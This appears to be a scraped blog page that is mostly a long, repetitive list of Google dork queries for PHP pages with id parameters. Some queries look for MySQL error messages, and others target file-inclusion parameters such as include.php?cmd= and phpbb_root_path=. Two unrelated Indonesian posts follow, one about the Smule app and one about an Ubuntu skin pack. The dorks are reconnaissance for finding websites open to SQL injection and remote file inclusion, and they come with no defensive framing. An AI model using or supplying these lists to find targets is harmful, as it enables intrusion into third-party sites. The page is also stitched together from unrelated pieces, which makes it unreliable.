inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:Productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:aboutbook.php?id=

inurl:review.php?id=

inurl:loadpsb.php?id=

inurl:ages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

trainers.php?id=

article.php?ID=

play_old.php?id=

declaration_more.php?decl_id=

Pageid=

games.php?id=

newsDetail.php?id=

staff_id=

historialeer.php?num=

product-item.php?id=

news_view.php?id=

humor.php?id=

communique_detail.php?id=

sem.php3?id=

opinions.php?id=

spr.php?id=

pages.php?id=

chappies.php?id=

prod_detail.php?id=

viewphoto.php?id=

view.php?id=

website.php?id=

hosting_info.php?id=

gery.php?id=

detail.php?ID=

publications.php?id=

Productinfo.php?id=

releases.php?id=

ray.php?id=

produit.php?id=

pop.php?id=

shopping.php?id=

productdetail.php?id=

post.php?id=

section.php?id=

theme.php?id=

page.php?id=

shredder-categories.php?id=

product_ranges_view.php?ID=

shop_category.php?id=

channel_id=

newsid=

news_display.php?getid=

ages.php?id=

clanek.php4?id=

review.php?id=

iniziativa.php?in=

curriculum.php?id=

labels.php?id=

look.php?ID=

galeri_info.php?l=

tekst.php?idt=

newscat.php?id=

newsticker_info.php?idn=

rubrika.php?idr=

offer.php?idf=

"id=" & intext:"Warning: mysql_fetch_array()

"id=" & intext:"Warning: getimagesize()

"id=" & intext:"Warning: session_start()

"id=" & intext:"Warning: mysql_num_rows()

"id=" & intext:"Warning: mysql_query()

"id=" & intext:"Warning: array_merge()

"id=" & intext:"Warning: preg_match()

"id=" & intext:"Warning: ilesize()

"id=" & intext:"Warning: filesize()

index.php?id=

buy.php?category=

article.php?ID=

play_old.php?id=

newsitem.php?num=

top10.php?cat=

historialeer.php?num=

reagir.php?num=

Stray-Questions-View.php?num=

forum_bds.php?num=

game.php?id=

view_product.php?id=

sw_comment.php?id=

news.php?id=

avd_start.php?avd=

event.php?id=

sql.php?id=

news_view.php?id=

select_biblio.php?id=

humor.php?id=

ogl_inet.php?ogl_id=

fiche_spectacle.php?id=

communique_detail.php?id=

sem.php3?id=

kategorie.php4?id=

faq2.php?id=

show_an.php?id=

preview.php?id=

loadpsb.php?id=

opinions.php?id=

spr.php?id=

announce.php?id=

participant.php?id=

download.php?id=

main.php?id=

review.php?id=

chappies.php?id=

read.php?id=

prod_detail.php?id=

article.php?id=

person.php?id=

productinfo.php?id=

showimg.php?id=

view.php?id=

website.php?id=

hosting_info.php?id=

gery.php?id=

rub.php?idr=

view_faq.php?id=

artikelinfo.php?id=

detail.php?ID=

index.php?=

profile_view.php?id=

category.php?id=

publications.php?id=

fellows.php?id=

downloads_info.php?id=

prod_info.php?id=

shop.php?do=part&id=

collectionitem.php?id=

band_info.php?id=

product.php?id=

releases.php?id=

ray.php?id=

produit.php?id=

pop.php?id=

shopping.php?id=

productdetail.php?id=

post.php?id=

viewshowdetail.php?id=

clubpage.php?id=

memberInfo.php?id=

section.php?id=

theme.php?id=

page.php?id=

shredder-categories.php?id=

tradeCategory.php?id=

product_ranges_view.php?ID=

shop_category.php?id=

transcript.php?id=

channel_id=

item_id=

newsid=

trainers.php?id=

news-full.php?id=

news_display.php?getid=

index2.php?option=

readnews.php?id=

newsone.php?id=

product-item.php?id=

pages.php?id=

clanek.php4?id=

viewapp.php?id=

viewphoto.php?id=

galeri_info.php?l=

iniziativa.php?in=

curriculum.php?id=

labels.php?id=

story.php?id=

look.php?ID=

aboutbook.php?id=

"id=" & intext:"Warning: mysql_fetch_assoc()

"id=" & intext:"Warning: is_writable()

"id=" & intext:"Warning: Unknown()

"id=" & intext:"Warning: mysql_result()

"id=" & intext:"Warning: pg_exec()

"id=" & intext:"Warning: require()

buy.php?category=

pageid=

page.php?file=

show.php?id=

newsitem.php?num=

readnews.php?id=

top10.php?cat=

reagir.php?num=

Stray-Questions-View.php?num=

forum_bds.php?num=

game.php?id=

view_product.php?id=

sw_comment.php?id=

news.php?id=

avd_start.php?avd=

event.php?id=

sql.php?id=

select_biblio.php?id=

ogl_inet.php?ogl_id=

fiche_spectacle.php?id=

kategorie.php4?id=

faq2.php?id=

show_an.php?id=

loadpsb.php?id=

announce.php?id=

participant.php?id=

download.php?id=

article.php?id=

person.php?id=

productinfo.php?id=

showimg.php?id=

rub.php?idr=

view_faq.php?id=

artikelinfo.php?id=

index.php?=

profile_view.php?id=

category.php?id=

fellows.php?id=

downloads_info.php?id=

prod_info.php?id=

shop.php?do=part&id=

collectionitem.php?id=

band_info.php?id=

product.php?id=

viewshowdetail.php?id=

clubpage.php?id=

memberInfo.php?id=

tradeCategory.php?id=

transcript.php?id=

item_id=

news-full.php?id=

aboutbook.php?id=

preview.php?id=

material.php?id=

read.php?id=

viewapp.php?id=

story.php?id=

newsone.php?id=

rubp.php?idr=

art.php?idm=

title.php?id=

index1.php?modo=

include.php?*[*]*=

nota.php?pollname=

index3.php?p=

padrao.php?pre=

home.php?pa=

main.php?type=

sitio.php?start=

*.php?include=

general.php?xlink=

show.php?go=

nota.php?ki=

down*.php?oldal=

layout.php?disp=

enter.php?chapter=

base.php?incl=

enter.php?mod=

show.php?corpo=

head.php?*[*]*=

info.php?strona=

template.php?str=

main.php?doshow=

view.php?*[*]*=

index.php?to=

page.php?cmd=

view.php?b=

info.php?option=

show.php?x=

template.php?texto=

index3.php?ir=

print.php?chapter=

file.php?inc=

file.php?cont=

view.php?cmd=

include.php?chapter=

path.php?my=

principal.php?param=

general.php?menue=

index1.php?b=

info.php?chapter=

nota.php?chapter=

general.php?include=

start.php?addr=

index1.php?qry=

index1.php?loc=

page.php?addr=

index1.php?dir=

principal.php?pr=

press.php?seite=

head.php?cmd=

home.php?sec=

home.php?category=

standard.php?cmd=

mod*.php?thispage=

base.php?to=

view.php?choix=

base.php?panel=

template.php?mod=

info.php?j=

blank.php?pref=

sub*.php?channel=

standard.php?in=

general.php?cmd=

pagina.php?panel=

template.php?where=

path.php?channel=

gery.php?seccion=

page.php?tipo=

sitio.php?rub=

pagina.php?u=

file.php?ir=

*inc*.php?sivu=

path.php?start=

page.php?chapter=

home.php?recipe=

enter.php?pname=

layout.php?path=

print.php?open=

mod*.php?channel=

down*.php?phpbb_root_path=

*inc*.php?str=

gery.php?phpbb_root_path=

include.php?middlePart=

sub*.php?destino=

info.php?read=

home.php?sp=

main.php?strona=

sitio.php?get=

sitio.php?index=

index3.php?option=

enter.php?a=

main.php?second=

print.php?pname=

blank.php?itemnav=

blank.php?pagina=

index1.php?d=

down*.php?where=

*inc*.php?include=

path.php?pre=

home.php?loader=

start.php?eval=

index.php?disp=

head.php?mod=

sitio.php?section=

nota.php?doshow=

home.php?seite=

home.php?a=

page.php?url=

pagina.php?left=

layout.php?c=

principal.php?goto=

standard.php?base_dir=

home.php?where=

page.php?sivu=

*inc*.php?adresa=

padrao.php?str=

include.php?my=

show.php?home=

index.php?load=

index3.php?rub=

sub*.php?str=

start.php?index=

nota.php?mod=

sub*.php?mid=

index1.php?*[*]*=

pagina.php?oldal=

padrao.php?loc=

padrao.php?rub=

page.php?incl=

gery.php?disp=

nota.php?oldal=

include.php?u=

principal.php?pagina=

print.php?choix=

head.php?filepath=

include.php?corpo=

sub*.php?action=

head.php?pname=

press.php?dir=

show.php?xlink=

file.php?left=

nota.php?destino=

general.php?module=

index3.php?redirect=

down*.php?param=

default.php?ki=

padrao.php?h=

padrao.php?read=

mod*.php?cont=

index1.php?l=

down*.php?pr=

gery.php?viewpage=

template.php?load=

nota.php?pr=

padrao.php?destino=

index2.php?channel=

principal.php?opcion=

start.php?str=

press.php?*[*]*=

index.php?ev=

pagina.php?pre=

nota.php?content=

include.php?adresa=

sitio.php?t=

index.php?sivu=

principal.php?q=

path.php?ev=

print.php?module=

index.php?loc=

nota.php?basepath=

padrao.php?tipo=

index2.php?in=

principal.php?eval=

file.php?qry=

info.php?t=

enter.php?play=

general.php?var=

principal.php?s=

standard.php?pagina=

standard.php?subject=

base.php?second=

head.php?inc=

pagina.php?basepath=

main.php?pname=

*inc*.php?modo=

include.php?goto=

file.php?pg=

head.php?g=

general.php?header=

start.php?*root*=

enter.php?pref=

index3.php?open=

start.php?module=

main.php?load=

enter.php?pg=

padrao.php?redirect=

pagina.php?my=

gery.php?pre=

enter.php?w=

info.php?texto=

enter.php?open=

base.php?rub=

gery.php?*[*]*=

include.php?cmd=

standard.php?dir=

layout.php?page=

index3.php?pageweb=

include.php?numero=

path.php?destino=

index3.php?home=

default.php?seite=

path.php?eval=

base.php?choix=

template.php?cont=

info.php?pagina=

default.php?x=

default.php?option=

gery.php?ki=

down*.php?second=

blank.php?path=

pagina.php?v=

file.php?pollname=

index3.php?var=

layout.php?goto=

pagina.php?incl=

home.php?action=

include.php?oldal=

print.php?left=

print.php?u=

nota.php?v=

home.php?str=

press.php?panel=

page.php?mod=

default.php?param=

down*.php?texto=

mod*.php?dir=

view.php?where=

blank.php?subject=

path.php?play=

base.php?l=

index2.php?rub=

general.php?opcion=

layout.php?xlink=

padrao.php?name=

pagina.php?nivel=

default.php?oldal=

template.php?k=

main.php?chapter=

layout.php?chapter=

layout.php?incl=

include.php?url=

base.php?sivu=

index.php?link=

sub*.php?cont=

info.php?oldal=

general.php?rub=

default.php?str=

head.php?ev=

sub*.php?path=

view.php?page=

main.php?j=

index2.php?basepath=

gery.php?qry=

main.php?url=

default.php?incl=

show.php?redirect=

index1.php?pre=

general.php?base_dir=

start.php?in=

show.php?abre=

index1.php?home=

home.php?ev=

index2.php?ki=

base.php?pag=

default.php?ir=

general.php?qry=

index2.php?home=

press.php?nivel=

enter.php?pr=

blank.php?loader=

start.php?cmd=

padrao.php?d=

sitio.php?recipe=

principal.php?read=

standard.php?showpage=

main.php?pg=

page.php?panel=

press.php?addr=

template.php?s=

main.php?tipo=

*inc*.php?ev=

padrao.php?page=

show.php?thispage=

home.php?secao=

main.php?start=

enter.php?mid=

press.php?id=

main.php?inc=

index3.php?cmd=

index.php?pname=

press.php?subject=

include.php?sec=

index3.php?xlink=

general.php?texto=

index3.php?go=

index.php?cmd=

index3.php?disp=

index3.php?left=

sub*.php?middle=

show.php?modo=

index1.php?pagina=

head.php?left=

enter.php?phpbb_root_path=

show.php?z=

start.php?basepath=

blank.php?strona=

template.php?y=

page.php?where=

layout.php?category=

index1.php?my=

principal.php?phpbb_root_path=

nota.php?channel=

page.php?choix=

start.php?xlink=

home.php?k=

standard.php?phpbb_root_path=

principal.php?middlePart=

mod*.php?m=

index.php?recipe=

template.php?path=

pagina.php?dir=

sitio.php?abre=

index1.php?recipe=

blank.php?page=

sub*.php?category=

*inc*.php?body=

enter.php?middle=

home.php?path=

down*.php?pre=

base.php?w=

main.php?path=

nota.php?ir=

press.php?link=

gery.php?pollname=

down*.php?open=

down*.php?pageweb=

default.php?eval=

view.php?showpage=

show.php?get=

sitio.php?tipo=

layout.php?cont=

default.php?destino=

padrao.php?seccion=

down*.php?r=

main.php?param=

standard.php?e=

down*.php?in=

nota.php?include=

sitio.php?secao=

print.php?my=

general.php?abre=

general.php?link=

default.php?id=

standard.php?panel=

show.php?channel=

enter.php?r=

index3.php?phpbb_root_path=

gery.php?where=

head.php?middle=

sub*.php?load=

gery.php?sp=

show.php?chapter=

sub*.php?b=

general.php?adresa=

print.php?goto=

sub*.php?sp=

template.php?doshow=

padrao.php?base_dir=

index2.php?my=

include.php?w=

start.php?op=

main.php?section=

view.php?header=

layout.php?menue=

head.php?y=

sub*.php?content=

show.php?type=

base.php?id=

mod*.php?qry=

default.php?strona=

sitio.php?chapter=

gery.php?index=

nota.php?h=

page.php?oldal=

enter.php?panel=

blank.php?t=

start.php?pollname=

sub*.php?module=

enter.php?thispage=

mod*.php?index=

sitio.php?r=

sub*.php?play=

index2.php?doshow=

index2.php?chapter=

show.php?path=

gery.php?to=

info.php?base_dir=

gery.php?abre=

gery.php?pag=

view.php?channel=

default.php?mod=

index.php?op=

general.php?pre=

padrao.php?type=

template.php?pag=

standard.php?pre=

blank.php?ref=

down*.php?z=

general.php?inc=

home.php?read=

pagina.php?section=

default.php?basepath=

index.php?pre=

sitio.php?pageweb=

base.php?seite=

*inc*.php?j=

index2.php?filepath=

file.php?type=

index1.php?oldal=

index2.php?second=

index3.php?sekce=

info.php?filepath=

base.php?opcion=

path.php?category=

index3.php?start=

start.php?rub=

*inc*.php?i=

blank.php?pre=

general.php?channel=

index2.php?OpenPage=

page.php?section=

mod*.php?middle=

index1.php?goFile=

blank.php?action=

principal.php?loader=

sub*.php?op=

main.php?addr=

start.php?mid=

gery.php?secao=

pagina.php?tipo=

index.php?w=

head.php?where=

principal.php?tipo=

press.php?loader=

gery.php?showpage=

gery.php?go=

enter.php?start=

press.php?lang=

general.php?p=

index.php?sekce=

index2.php?get=

sitio.php?go=

include.php?cont=

sub*.php?where=

index3.php?index=

path.php?recipe=

info.php?loader=

print.php?sp=

page.php?phpbb_root_path=

path.php?body=

principal.php?menue=

print.php?cont=

pagina.php?z=

default.php?mid=

blank.php?xlink=

sub*.php?oldal=

general.php?b=

include.php?left=

print.php?sivu=

press.php?OpenPage=

default.php?cont=

general.php?pollname=

template.php?nivel=

enter.php?page=

file.php?middle=

standard.php?str=

gery.php?get=

main.php?v=

down*.php?subject=

enter.php?sivu=

path.php?option=

index.php?strona=

index1.php?choix=

index2.php?f=

press.php?destino=

pagina.php?channel=

principal.php?b=

home.php?include=

head.php?numero=

general.php?ref=

main.php?dir=

gery.php?cont=

principal.php?type=

file.php?param=

default.php?secao=

path.php?pageweb=

info.php?r=

base.php?phpbb_root_path=

main.php?itemnav=

view.php?pg=

pagina.php?choix=

default.php?itemnav=

index2.php?cmd=

layout.php?url=

index.php?path=

index1.php?second=

start.php?modo=

index1.php?get=

index3.php?my=

sub*.php?left=

print.php?inc=

view.php?type=

path.php?*[*]*=

base.php?adresa=

index3.php?oldal=

standard.php?body=

base.php?path=

principal.php?strona=

info.php?l=

template.php?left=

head.php?loc=

page.php?ir=

print.php?path=

down*.php?path=

sitio.php?opcion=

pagina.php?category=

press.php?menu=

index2.php?pref=

sitio.php?incl=

show.php?ki=

index3.php?x=

page.php?strona=

*inc*.php?open=

index3.php?secao=

standard.php?*[*]*=

template.php?basepath=

standard.php?goFile=

index2.php?ir=

file.php?modo=

gery.php?itemnav=

main.php?oldal=

down*.php?showpage=

start.php?destino=

blank.php?rub=

path.php?ir=

Cara memperbagus suara menggunakan aplikasi

Siapa yang tidak mau mempunyai suara bagus? semua orang pasti ingin mempunyai suara bagus seperti layaknya penyanyi,kali ini saya akan memberi tips untuk kalian,bagaimana memperbagus suara hanya dengan menggunakan aplikasi yang cukup kalian download di android atau di iphone kalian,aplikasi ini free dan untuk menambahkan fitur studio hanya mengeluarkan uang tidak lebih

dari 50 ribu

ya betul nama aplikasinya adalah smule,kalian bisa merasakan sensasi rekaman seperti di studio dan ada fitur duetnya yang menghubungkan orang di setiap negara

bahkan kalian juga bisa duet langsung bersama penyanyi Jessie J,seperti video di atas.

playstore: disini

apk: disini

Ubuntu SkinPack For Windows 7/8/8.1/10

Salah satu kehebatan Windows 7 itu flexible untuk memodifikasi-memodifikasi system operasi apapun,dan kali ini saya akan share skinpack ubuntu untuk windows 7/8/8.1/10

Screenshot:

Link Downloadnya:
Server 1: Klik Here
Server 2: Klik Here

Selamat Mencoba :)

Catatan : Skin Packs installer mudah dilakukan dan juga aman, Jika Kamu sebelumnya telah menginstal sebuah Skin pack, sebaiknya kamu uninstal dulu skin pack tersebut sebelum mengintal yang baru. Sebelum menginstal, tutup dulu semua program yang berjalan ,Setelah selesai, Restart Windows Anda.

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

Related Posts:

.